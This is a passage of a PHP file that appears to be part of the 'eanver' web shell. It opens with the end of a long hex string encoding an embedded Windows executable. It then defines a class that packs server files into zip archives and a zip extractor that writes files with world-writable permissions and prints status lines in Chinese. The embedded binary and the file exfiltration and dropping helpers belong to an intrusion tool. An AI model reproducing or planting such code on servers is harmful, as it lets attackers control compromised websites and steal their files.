00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
2598}
2599
2600class eanver{
2601var $out='';
2602function __construct($dir){
2603 if(@function_exists('gzcompress')){
2604 if(count($dir) > 0){
2605 foreach($dir as $file){
2606 if(is_file($file)){
2607 $filecode = file_get_contents($file);
2608 if(is_array($dir)) $file = basename($file);
2609 $this -> filezip($filecode,$file);
2610 }
2611 }
2612 $this->out = $this -> packfile();
2613 }
2614 return true;
2615 }
2616 else return false;
2617}
2618 var $datasec = array();
2619 var $ctrl_dir = array();
2620 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
2621 var $old_offset = 0;
2622 function at($atunix = 0) {
2623 $unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
2624 if ($unixarr['year'] < 1980) {
2625 $unixarr['year'] = 1980;
2626 $unixarr['mon'] = 1;
2627 $unixarr['mday'] = 1;
2628 $unixarr['hours'] = 0;
2629 $unixarr['minutes'] = 0;
2630 $unixarr['seconds'] = 0;
2631 }
2632 return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
2633 ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
2634 }
2635 function filezip($data, $name, $time = 0) {
2636 $name = str_replace('\\', '/', $name);
2637 $dtime = dechex($this->at($time));
2638 $hexdtime = '\x' . $dtime[6] . $dtime[7]
2639 . '\x' . $dtime[4] . $dtime[5]
2640 . '\x' . $dtime[2] . $dtime[3]
2641 . '\x' . $dtime[0] . $dtime[1];
2642 eval('$hexdtime = "' . $hexdtime . '";');
2643 $fr = "\x50\x4b\x03\x04";
2644 $fr .= "\x14\x00";
2645 $fr .= "\x00\x00";
2646 $fr .= "\x08\x00";
2647 $fr .= $hexdtime;
2648 $unc_len = strlen($data);
2649 $crc = crc32($data);
2650 $zdata = gzcompress($data);
2651 $c_len = strlen($zdata);
2652 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
2653 $fr .= pack('V', $crc);
2654 $fr .= pack('V', $c_len);
2655 $fr .= pack('V', $unc_len);
2656 $fr .= pack('v', strlen($name));
2657 $fr .= pack('v', 0);
2658 $fr .= $name;
2659 $fr .= $zdata;
2660 $fr .= pack('V', $crc);
2661 $fr .= pack('V', $c_len);
2662 $fr .= pack('V', $unc_len);
2663 $this -> datasec[] = $fr;
2664 $new_offset = strlen(implode('', $this->datasec));
2665 $cdrec = "\x50\x4b\x01\x02";
2666 $cdrec .= "\x00\x00";
2667 $cdrec .= "\x14\x00";
2668 $cdrec .= "\x00\x00";
2669 $cdrec .= "\x08\x00";
2670 $cdrec .= $hexdtime;
2671 $cdrec .= pack('V', $crc);
2672 $cdrec .= pack('V', $c_len);
2673 $cdrec .= pack('V', $unc_len);
2674 $cdrec .= pack('v', strlen($name) );
2675 $cdrec .= pack('v', 0 );
2676 $cdrec .= pack('v', 0 );
2677 $cdrec .= pack('v', 0 );
2678 $cdrec .= pack('v', 0 );
2679 $cdrec .= pack('V', 32 );
2680 $cdrec .= pack('V', $this -> old_offset );
2681 $this -> old_offset = $new_offset;
2682 $cdrec .= $name;
2683 $this -> ctrl_dir[] = $cdrec;
2684 }
2685 function packfile(){
2686 $data = implode('', $this -> datasec);
2687 $ctrldir = implode('', $this -> ctrl_dir);
2688 return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
2689 }
2690}
2691
2692class zip
2693{
2694
2695 var $total_files = 0;
2696 var $total_folders = 0;
2697
2698 function Extract ( $zn, $to, $index = Array(-1) )
2699 {
2700 $ok = 0; $zip = @fopen($zn,'rb');
2701 if(!$zip) return(-1);
2702 $cdir = $this->ReadCentralDir($zip,$zn);
2703 $pos_entry = $cdir['offset'];
2704
2705 if(!is_array($index)){ $index = array($index); }
2706 for($i=0; $index[$i];$i++){
2707 if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
2708 return(-1);
2709 }
2710 for ($i=0; $i<$cdir['entries']; $i++)
2711 {
2712 @fseek($zip, $pos_entry);
2713 $header = $this->ReadCentralFileHeaders($zip);
2714 $header['index'] = $i; $pos_entry = ftell($zip);
2715 @rewind($zip); fseek($zip, $header['offset']);
2716 if(in_array("-1",$index)||in_array($i,$index))
2717 $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
2718 }
2719 fclose($zip);
2720 return $stat;
2721 }
2722
2723 function ReadFileHeader($zip)
2724 {
2725 $binary_data = fread($zip, 30);
2726 $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
2727
2728 $header['filename'] = fread($zip, $data['filename_len']);
2729 if ($data['extra_len'] != 0) {
2730 $header['extra'] = fread($zip, $data['extra_len']);
2731 } else { $header['extra'] = ''; }
2732
2733 $header['compression'] = $data['compression'];$header['size'] = $data['size'];
2734 $header['compressed_size'] = $data['compressed_size'];
2735 $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
2736 $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
2737
2738 if ($header['mdate'] && $header['mtime']){
2739 $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
2740 $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
2741 $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
2742 $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
2743 }else{$header['mtime'] = time();}
2744
2745 $header['stored_filename'] = $header['filename'];
2746 $header['status'] = "ok";
2747 return $header;
2748 }
2749
2750 function ReadCentralFileHeaders($zip){
2751 $binary_data = fread($zip, 46);
2752 $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
2753
2754 if ($header['filename_len'] != 0)
2755 $header['filename'] = fread($zip,$header['filename_len']);
2756 else $header['filename'] = '';
2757
2758 if ($header['extra_len'] != 0)
2759 $header['extra'] = fread($zip, $header['extra_len']);
2760 else $header['extra'] = '';
2761
2762 if ($header['comment_len'] != 0)
2763 $header['comment'] = fread($zip, $header['comment_len']);
2764 else $header['comment'] = '';
2765
2766 if ($header['mdate'] && $header['mtime'])
2767 {
2768 $hour = ($header['mtime'] & 0xF800) >> 11;
2769 $minute = ($header['mtime'] & 0x07E0) >> 5;
2770 $seconde = ($header['mtime'] & 0x001F)*2;
2771 $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
2772 $month = ($header['mdate'] & 0x01E0) >> 5;
2773 $day = $header['mdate'] & 0x001F;
2774 $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
2775 } else {
2776 $header['mtime'] = time();
2777 }
2778 $header['stored_filename'] = $header['filename'];
2779 $header['status'] = 'ok';
2780 if (substr($header['filename'], -1) == '/')
2781 $header['external'] = 0x41FF0010;
2782 return $header;
2783 }
2784
2785 function ReadCentralDir($zip,$zip_name){
2786 $size = filesize($zip_name);
2787
2788 if ($size < 277) $maximum_size = $size;
2789 else $maximum_size=277;
2790
2791 @fseek($zip, $size-$maximum_size);
2792 $pos = ftell($zip); $bytes = 0x00000000;
2793
2794 while ($pos < $size){
2795 $byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);
2796 if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;
2797 }
2798
2799 $fdata=fread($zip,18);
2800
2801 $data=@unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',$fdata);
2802
2803 if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
2804 else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
2805 $centd['disk_entries'] = $data['disk_entries'];
2806 $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
2807 $centd['size'] = $data['size']; $centd['disk'] = $data['disk'];
2808 return $centd;
2809 }
2810
2811 function ExtractFile($header,$to,$zip){
2812 $header = $this->readfileheader($zip);
2813
2814 if(substr($to,-1)!="/") $to.="/";
2815 if($to=='./') $to = '';
2816 $pth = explode("/",$to.$header['filename']);
2817 $mydir = '';
2818 for($i=0;$i<count($pth)-1;$i++){
2819 if(!$pth[$i]) continue;
2820 $mydir .= $pth[$i]."/";
2821 if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){
2822 @chmod($mydir,0777);
2823 $this->total_folders ++;
2824 echo "目录: $mydir<br>";
2825 }
2826 }
2827
2828 if(strrchr($header['filename'],'/')=='/') return;
2829
2830 if (!($header['external']==0x41FF0010)&&!($header['external']==16)){
2831 if ($header['compression']==0){
2832 $fp = @fopen($to.$header['filename'], 'wb');
2833 if(!$fp) return(-1);
2834 $size = $header['compressed_size'];
2835
2836 while ($size != 0){
2837 $read_size = ($size < 2048 ? $size : 2048);
2838 $buffer = fread($zip, $read_size);
2839 $binary_data = pack('a'.$read_size, $buffer);
2840 @fwrite($fp, $binary_data, $read_size);
2841 $size -= $read_size;
2842 }
2843 fclose($fp);
2844 touch($to.$header['filename'], $header['mtime']);
2845 }else{
2846 $fp = @fopen($to.$header['filename'].'.gz','wb');
2847 if(!$fp) return(-1);
2848 $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
2849 Chr(0x00), time(), Chr(0x00), Chr(3));
2850
2851 fwrite($fp, $binary_data, 10);
2852 $size = $header['compressed_size'];
2853
2854 while ($size != 0){
2855 $read_size = ($size < 1024 ? $size : 1024);
2856 $buffer = fread($zip, $read_size);
2857 $binary_data = pack('a'.$read_size, $buffer);
2858 @fwrite($fp, $binary_data, $read_size);
2859 $size -= $read_size;
2860 }
2861
2862 $binary_data = pack('VV', $header['crc'], $header['size']);
2863 fwrite($fp, $binary_data,8); fclose($fp);
2864
2865 $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
2866 if(!$gzp) return(-2);
2867 $fp = @fopen($to.$header['filename'],'wb');
2868 if(!$fp) return(-1);
2869 $size = $header['size'];
2870
2871 while ($size != 0){
2872 $read_size = ($size < 2048 ? $size : 2048);
2873 $buffer = gzread($gzp, $read_size);
2874 $binary_data = pack('a'.$read_size, $buffer);
2875 @fwrite($fp, $binary_data, $read_size);
2876 $size -= $read_size;
2877 }
2878 fclose($fp); gzclose($gzp);
2879
2880 touch($to.$header['filename'], $header['mtime']);
2881 @unlink($to.$header['filename'].'.gz');
2882
2883 }
2884 }
2885
2886 $this->total_files ++;
2887 echo "文件: $to$header[filename]<br>";
2888 return true;
2889 }
2890}
2891ob_end_flush();